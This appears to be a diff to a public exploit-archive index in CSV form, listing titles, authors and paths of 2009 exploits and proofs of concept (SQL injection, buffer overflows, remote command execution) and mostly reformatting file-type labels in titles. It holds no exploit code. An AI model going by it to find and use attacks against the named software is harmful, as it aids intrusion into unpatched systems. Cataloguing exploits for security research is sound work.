+7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 - (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 @@ -7421,10 +7421,10 @@ id,file,description,date,author,platform,type,port 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0 7885,platforms/php/webapps/7885.txt,"Max.Blog <= 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion Vulnerabilities",2009-01-27,DSecRG,php,webapps,0 -7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - (PLS File) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 -7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - (PLS File) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 -7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 -7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (gqmpeg File) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - (.pls) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - (.pls) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 +7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - (.M3U) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 +7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 - (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (XSS/SQL/LFI) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 @@ -7437,7 +7437,7 @@ id,file,description,date,author,platform,type,port 7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection Exploit",2009-01-28,certaindeath,php,webapps,0 7902,platforms/windows/dos/7902.txt,"Amaya Web Editor XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 7903,platforms/windows/remote/7903.html,"Google Chrome 1.0.154.43 - ClickJacking",2009-01-28,x0x,windows,remote,0 -7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder (M3U File) Crash PoC",2009-01-29,Hakxer,windows,dos,0 +7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - (.M3U) Crash PoC",2009-01-29,Hakxer,windows,dos,0 7905,platforms/php/webapps/7905.pl,"Personal Site Manager <= 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor <= 11.0 - Remote Buffer Overflow PoC",2009-01-29,Stack,windows,dos,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 @@ -7465,14 +7465,14 @@ id,file,description,date,author,platform,type,port 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - (Topic) Remote XSS",2009-01-30,J-Hacker,php,webapps,0 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Auth Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0 7933,platforms/php/webapps/7933.txt,"eVision CMS <= 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 -7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - (asx File) off by one Crash Exploit",2009-01-30,Houssamix,windows,dos,0 +7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - (.asx) off by one Crash Exploit",2009-01-30,Houssamix,windows,dos,0 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (RFI/XSS) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (Windows)",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Auth Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Auth Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 -7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0 +7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER - (.m3u/.xpl) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0 7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0 7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 @@ -7540,7 +7540,7 @@ id,file,description,date,author,platform,type,port 8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 - (id) Remote SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 -8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - (.JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 +8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - (.JPG) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS <= 1.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 - (XSS/RFI) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 @@ -7658,7 +7658,7 @@ id,file,description,date,author,platform,type,port 8134,platforms/php/webapps/8134.php,"Joomla com_digistore (pid) Blind SQL Injection Exploit",2009-03-02,InjEctOr5,php,webapps,0 8135,platforms/windows/dos/8135.pl,"Media Commands - (M3U & M3l & TXT & LRC Files) Local Heap Overflow PoC",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla/Mambo Component eXtplorer Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 -8137,platforms/windows/local/8137.py,"Media Commands (m3u File) Local SEH Overwrite Exploit",2009-03-02,His0k4,windows,local,0 +8137,platforms/windows/local/8137.py,"Media Commands (.m3u) Local SEH Overwrite Exploit",2009-03-02,His0k4,windows,local,0 8138,platforms/windows/local/8138.c,"VUplayer 2.49 - (.cue) Local Buffer Overflow Exploit",2009-03-02,"Assed Edin",windows,local,0 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - (ab/XSS) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 @@ -7679,7 +7679,7 @@ id,file,description,date,author,platform,type,port 8159,platforms/windows/local/8159.rb,"Media Commands .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 -8162,platforms/windows/local/8162.py,"Media Commands (m3u File) Universal SEH Overwrite Exploit",2009-03-05,His0k4,windows,local,0 +8162,platforms/windows/local/8162.py,"Media Commands (.m3u) Universal SEH Overwrite Exploit",2009-03-05,His0k4,windows,local,0 8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service Exploit",2009-03-05,SecurityReason,bsd,dos,0 8164,platforms/php/webapps/8164.php,"Joomla com_ijoomla_archive Blind SQL Injection Exploit",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS <= 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 @@ -7694,7 +7694,7 @@ id,file,description,date,author,platform,type,port 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation Exploit",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - PlayList SEH Overwrite Exploit",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - (.RAP) Local Stack Overflow Exploit",2009-03-09,zAx,windows,local,0 -8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 - (m3u File) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 +8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 - (.m3u) Universal Stack Overflow Exploit",2009-03-09,Stack,windows,local,0 8179,platforms/windows/local/8179.rb,"MediaCoder 0.6.2.4275 - Universal Buffer Overflow Exploit (SEH)",2009-03-09,Stack,windows,local,0 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 - (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 @@ -7705,7 +7705,7 @@ id,file,description,date,author,platform,type,port 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter Post-Auth Denial of Service Exploit",2009-03-09,h00die,hardware,dos,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! Multiple SQL Injection Vulnerabilities",2009-03-10,M3NW5,php,webapps,0 -8189,platforms/windows/local/8189.txt,"VUPlayer <= 2.49 - (.cue) Universal Buffer Overflow Exploit",2009-03-10,Stack,windows,local,0 +8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - (.cue) Universal Buffer Overflow Exploit",2009-03-10,Stack,windows,local,0 8190,platforms/windows/dos/8190.txt,"IBM Director <= 5.20.3su2 CIM Server Remote DoS",2009-03-10,"Bernhard Mueller",windows,dos,0 8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (playlist) Universal SEH Overwrite Exploit",2009-03-10,His0k4,windows,local,0 @@ -7735,7 +7735,7 @@ id,file,description,date,author,platform,type,port 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow PoC",2009-03-16,Stack,windows,dos,0 -8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - (Subtitle File) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 +8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow Exploit (SEH)",2009-03-17,LiquidWorm,windows,remote,0 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) Remote SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 @@ -7808,8 +7808,8 @@ id,file,description,date,author,platform,type,port 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script (username) Static XSS",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (LFI) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 -8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - (CMP File) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 -8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - (hhp File) Stack Overflow poC",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 +8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - (.CMP) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 +8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - (.hhp) Stack Overflow poC",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow Exploit",2009-03-29,LiquidWorm,windows,local,0 8302,platforms/php/webapps/8302.php,"glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit",2009-03-29,Nine:Situations:Group,php,webapps,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Local Privilege Escalation Exploit",2009-03-29,"Jon Oberheide",linux,local,0 @@ -7957,7 +7957,7 @@ id,file,description,date,author,platform,type,port 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Auth Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 -8451,platforms/windows/dos/8451.pl,"Apollo 37zz (M3u File) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 +8451,platforms/windows/dos/8451.pl,"Apollo 37zz - (.m3u) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player .XPL Stack Buffer Overflow (SEH) PoC",2009-04-16,"fl0 fl0w",windows,dos,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 @@ -8073,7 +8073,7 @@ id,file,description,date,author,platform,type,port 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b (index.php sn) Remote SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 -8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - (YUV File) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 +8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) Remote SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 @@ -8202,7 +8202,7 @@ id,file,description,date,author,platform,type,port 8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion Vulnerabilities",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit",2009-05-15,hack4love,windows,local,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 -8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 - (download.php file) File Disclosure",2009-05-15,Br0ly,php,webapps,0 +8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 - (download.php) File Disclosure",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass",2009-05-15,kingcope,windows,remote,0 @@ -8470,7 +8470,7 @@ id,file,description,date,author,platform,type,port 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Remote Blind SQL Injection Exploit",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 -8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 - (XBM File) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 +8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 - (.XBM) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz - (XSS/pc/hi) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 @@ -8542,7 +8542,7 @@ id,file,description,date,author,platform,type,port 9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 - Arbitrary Administrator Account",2009-06-30,"ThE g0bL!N",php,webapps,0 -9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 +9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - (.plf) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling",2009-07-01,Stack,php,webapps,0 @@ -8583,7 +8583,7 @@ id,file,description,date,author,platform,type,port 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer (AddFavorite) Remote Crash PoC",2009-07-09,Sberry,windows,dos,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 -9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 +9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - (.M3U) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BoF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - (uid) Remote SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 @@ -8805,7 +8805,7 @@ id,file,description,date,author,platform,type,port 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) RFI",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script (Auth Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 -9334,platforms/php/webapps/9334.txt,"QuickDev 4 - (download.php file) File Disclosure",2009-08-03,SirGod,php,webapps,0 +9334,platforms/php/webapps/9334.txt,"QuickDev 4 - (download.php) File Disclosure",2009-08-03,SirGod,php,webapps,0 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 @@ -8861,7 +8861,7 @@ id,file,description,date,author,platform,type,port 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) Remote SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 -9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - (m3u File) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 +9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Auth Bypass) Blind SQL Injection Exploit",2009-08-07,"Jafer Al Zidjali",php,webapps,0 9395,platforms/php/webapps/9395.txt,"PHPCityPortal (Auth Bypass) Remote SQL Injection",2009-08-07,CoBRa_21,php,webapps,0 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (RFI/LFI/XSS) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0 @@ -8881,7 +8881,7 @@ id,file,description,date,author,platform,type,port 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 -9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 +9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - (.EOT) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 @@ -8939,7 +8939,7 @@ id,file,description,date,author,platform,type,port 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 -9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 +9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 @@ -9070,7 +9070,7 @@ id,file,description,date,author,platform,type,port 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional Remote Format String PoC",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow Exploit",2009-09-09,"Jeremy Brown",linux,local,0 9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar Remote SQL Injection",2009-09-09,M3NW5,php,webapps,0 -9610,platforms/windows/local/9610.py,"Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)",2009-09-09,blake,windows,local,0 +9610,platforms/windows/local/9610.py,"Audio Lib Player (.m3u) Buffer Overflow Exploit (SEH)",2009-09-09,blake,windows,local,0 9611,platforms/php/webapps/9611.txt,"phpNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 @@ -9145,13 +9145,13 @@ id,file,description,date,author,platform,type,port 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow PoC",2009-09-15,Dr_IDE,windows,dos,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0 9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (ping option) Command Injection (Auth)",2009-09-15,r00t,hardware,local,0 -9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0 +9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - (.m3u) Local Crash PoC",2009-09-15,zAx,windows,dos,0 